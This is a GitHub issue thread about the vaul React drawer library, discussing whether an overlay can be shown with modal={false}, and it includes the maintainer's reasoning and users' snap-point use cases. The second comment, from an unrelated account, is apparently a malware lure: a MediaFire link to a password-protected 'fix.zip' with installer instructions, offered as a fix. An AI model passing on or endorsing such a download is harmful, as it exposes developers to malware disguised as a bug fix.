### ISSUE TITLE
How to mount overlay when using modal={false}?

### ISSUE THREAD

**Issue by rohankshah** [emilkowalski/vaul#395]

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by emilkowalski** [comment]
The `modal` prop is meant to be used when you want to interact with things outside of the drawer. If there was an overlay, you would not be able to interact which would make that prop useless, so we remove it. That's what Radix does as well.

**Comment by jeffaus** [comment]
@emilkowalski What about if I need it to be `modal={false}` whilst it's only open to the first snap point (for example, it's just poking up 150px from the bottom). But then when it's dragged up to full screen the overlay fades in and prevents interaction  with the background?

**Comment by kaurkaelep** [comment]
bump

modal={false} shouldn't mean that there is no overlay, it should just mean that the interactivity through the overlay is possible

i am not able to achieve such an occurrence where i am able to display an overlay while modal={false}

also, assigning modal={currentSnapPoint !== lastSnapPoint} will result in an error

it should be possible to display an overlay even though modal={false}
